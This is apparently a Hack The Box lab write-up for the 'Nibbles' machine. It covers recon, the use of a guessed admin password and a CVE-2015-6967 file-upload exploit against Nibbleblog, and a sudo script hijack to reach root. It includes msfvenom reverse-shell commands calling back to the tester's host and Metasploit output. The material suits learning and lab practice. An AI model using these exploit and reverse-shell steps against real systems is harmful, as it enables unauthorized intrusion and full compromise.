Contents

🕵 HTB-Writeup : NIBBLES

Recon

nmap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
nmap -A -sV -Pn 10.10.10.75

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.18 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

We are face of website with an Hello world!.

gobuster

No result from gobuster. I was not able to find any directories or files.

After some time, I manage to search if Nibbles ou Nibble was a webservice or an application that I did not know about. I found that Nibbleblog is an engine written in php for creating blogs.

We can then find the link to the main page at: http://10.10.10.75/nibbleblog/

drawing

Screenshot of the nibbleblog page

We retry the gobuster scan.

1
2
3
4
5
6
7
8
9
===============================================================
/content              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/content/]
/themes               (Status: 301) [Size: 322] [--> http://10.10.10.75/nibbleblog/themes/] 
/admin                (Status: 301) [Size: 321] [--> http://10.10.10.75/nibbleblog/admin/]  
/plugins              (Status: 301) [Size: 323] [--> http://10.10.10.75/nibbleblog/plugins/]
/README               (Status: 200) [Size: 4628]                                            
/languages            (Status: 301) [Size: 325] [--> http://10.10.10.75/nibbleblog/languages/]
                                                                                              
===============================================================

Vulnerabilities

Thanks to exploitdb, we can see that there are 2 vulnerabilities listed for Nibbleblog.

1
2
3
4
5
6
7
└─$ searchsploit nibble       
-------------------------------------------------------------------------------------------
 Exploit Title                                           |  Path
-------------------------------------------------------------------------------------------
Nibbleblog 3 - Multiple SQL Injections                   | php/webapps/35865.txt
Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit)    | php/remote/38489.rb
-------------------------------------------------------------------------------------------

One of the vulnerability has been attributed to CVE-2015-6967. I found an exploit on github, let’s try it!

Exploit

W/o Metasploit

For the exploit, we need to provide:

  • url
  • username
  • password
  • payload

Navigating throught directories I found a users.xml file that contains a user, here admin.

drawing

Trying some default and some guessed password on the admin login page http://10.10.10.75/nibbleblog/admin.php, I found those credentials admin:nibbles.

For the payload, I manage to use msfvenom to create a php reverse shell. Then I provide this payload to the python script.

1
2
3
4
5
6
7
# creating our php reverse shell payload
└─$ msfvenom -p php/reverse_php LHOST=10.10.16.6 LPORT=4444 > shell.php

└─$ python3 exploit.py --url http://10.10.10.75/nibbleblog/ --username admin --password nibbles --payload shell.php
[+] Login Successful.
[+] Upload likely successfull.
[+] Exploit launched, check for shell.

The exploit seems to be successfull. We can see that an image has been uploaded. It correspond to our reverse shell.

drawing

We simply go to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/image.php to try to get our shell. Don’t forget to listen on the port specify on the payload with netcat.

We got a shell! We are connected with the user nibbler, we can now get the user flag.

1
2
3
4
5
whoami
nibbler

cat /home/nibbler/user.txt
*************************7564559

W/ Metasploit

We can load the multi/http/nibbleblog_file_upload module on the Metasploit console. Then, enter our options.

Name Value
USERNAME admin
PASSWORD nibbles
TARGETURI /nibbleblog
1
2
3
4
5
6
msf6 exploit(multi/http/nibbleblog_file_upload) > exploit

[*] Started reverse TCP handler on 10.10.XX.X:4444 
[*] Sending stage (39927 bytes) to 10.10.10.75
[+] Deleted image.php
[*] Meterpreter session 1 opened (10.10.XX.X:4444 -> 10.10.10.75:37934) at 2022-08-05 22:06:44 +0200

We are now in! Let’s continue to the privesc.

Privesc

Checking user sudo privileges, we can see that nibbler can execute the script monitor.sh in root in that directory: /home/nibbler/personal/stuff/.

1
2
3
4
5
6
sudo -l 
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh

We juste have to invoke a shell throught that file.

1
2
3
4
5
6
7
$ mkdir -p /home/nibbler/personal/stuff/
$ echo "/bin/bash" > monitor.sh
$ chmod +x monitor.sh
$ sudo ./monitor.sh

root@Nibbles:/home/nibbler/personal/stuff# cat /root/root.txt
*************************0da949e

We are now system owner !

Tags

Easy, External, Nibbleblog, Penetration Tester Level 1, CVE Exploitation, CVE-2015-6967, A06:2021-Vulnerable And Outdated Components, User Enumeration, Sudo Exploitation, Public Vulnerabilities, Security Tools